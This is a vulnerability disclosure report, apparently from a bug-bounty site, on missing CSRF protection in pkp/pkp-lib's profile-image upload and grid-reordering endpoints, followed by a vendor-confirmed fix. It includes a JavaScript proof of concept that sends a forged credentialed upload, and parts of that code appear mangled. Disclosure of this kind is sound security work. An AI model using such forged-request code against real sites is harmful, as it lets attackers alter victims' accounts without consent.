Cross-Site Request Forgery (CSRF) in pkp/pkp-lib


Reported on

Oct 16th 2021


No CSRF in upload profile too: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:



POC for upload files

        var xhr = new XMLHttpRequest();"POST", "$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = "true";
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; ; filename=\"cat.jpg\"\r\n" + 
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));


This vulnerability is capable of tricking users to change their user profile picture.


no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back a year ago
haxatron modified the report
a year ago
Alec Smecher validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher confirmed that a fix has been merged on 169885 a year ago
Alec Smecher has been awarded the fix bounty
Alec Smecher
a year ago

Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:

to join this conversation